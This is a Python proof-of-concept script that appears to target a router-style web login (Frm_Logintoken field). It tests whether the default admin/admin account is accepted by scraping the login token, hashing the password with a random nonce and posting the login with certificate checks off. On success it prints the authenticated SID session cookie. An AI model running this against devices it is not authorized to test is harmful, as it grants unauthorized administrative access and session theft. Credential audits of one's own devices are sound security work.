# -*- encoding: utf-8 -*-
import base64
import hashlib
import random
import re
import traceback
from warnings import filterwarnings
import requests
# Suppresses every warning category for the whole process, not only TLS ones.
# For HTTPS targets this also hides the certificate warning that the
# verify=False requests in POC would otherwise produce.
filterwarnings("ignore")
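class POC:
    """Check whether a device's web login still accepts the default admin/admin account.

    One instance targets one base URL. ``verify()`` performs a single login
    attempt and reports whether the default credentials were accepted, so the
    finding can be recorded and the password changed.
    """

    def __init__(self, url):
        """Store the target base URL and prepare the HTTP session.

        Args:
            url: Base URL of the login page. A trailing "/" is appended when
                it is missing; the Referer header keeps the value as given.
        """
        self.url = url if url.endswith("/") else f"{url}/"
        self.s = requests.Session()
        self.s.headers.update({
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
            "Referer": url,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8"
        })

    def get_token(self):
        """Fetch the login page and return its ``Frm_Logintoken`` value.

        Returns:
            The digits assigned to ``Frm_Logintoken`` in the page script, else
            the digits in the form field's ``value`` attribute, else the
            literal ``"13"`` when neither pattern is present.
        """
        # verify=False turns certificate validation off, so the answering host
        # is not authenticated; the result describes whatever replied at the URL.
        r = self.s.get(self.url, verify=False, allow_redirects=True, timeout=10)
        token_match = re.search(
            r'getObj\s*\(\s*"Frm_Logintoken"\s*\)\s*\.value\s*=\s*["\'](\d+)["\']',
            r.text,
            re.IGNORECASE,
        )
        if token_match:
            return token_match.group(1)
        fallback = re.search(r'name="Frm_Logintoken"\s*[^>]*value="(\d+)"', r.text)
        # NOTE(review): "13" is a hard-coded last resort. If the device rejects
        # the login because of the token, verify() reports "not accepted" even
        # though the credentials were never really tested -- confirm.
        return fallback.group(1) if fallback else "13"

    def verify(self):
        """Attempt one login with admin/admin and report the outcome.

        Returns:
            True when the reply is a 302 whose Location ends in "start.ghtml"
            (the default credentials were accepted), False for any other
            reply, and None when an exception prevented the check from
            completing. The three values keep "rejected" distinct from
            "could not be checked".
        """
        try:
            token = self.get_token()
            rand_num = str(random.randint(10000000, 99999999))
            pwd = "admin"
            # The Password field carries MD5(password + UserRandomNum), and the
            # random number itself is posted alongside it.
            final_pwd = hashlib.md5((pwd + rand_num).encode()).hexdigest()
            data = {
                "frashnum": "",
                "action": "login",
                "Frm_Logintoken": token,
                "UserRandomNum": rand_num,
                "Username": "admin",
                "Password": final_pwd,
                "LoginId": "Login"
            }
            resp = self.s.post(self.url, data=data, allow_redirects=False, verify=False, timeout=10)
            accepted = (
                resp.status_code == 302
                and resp.headers.get("Location", "").endswith("start.ghtml")
            )
            if accepted:
                # The SID value is a live authenticated session identifier;
                # treat any captured output as sensitive.
                print(f"SID Cookie: {self.s.cookies.get('SID', '无')}")
                print("YES!! \n User:admin\n Pwd:admin\n")
            else:
                print("NO: default admin/admin login was not accepted")
            return accepted
        except Exception as e:
            # Best-effort check: report the failure and signal "not completed".
            traceback.print_exc()
            print(e)
            return None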
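if __name__ == "__main__":
    import sys

    # The first argument is the base URL of the login page to check; without
    # it the original indexing raised IndexError instead of explaining usage.
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <base-url>")
    arg = sys.argv
    POC(arg[1]).verify()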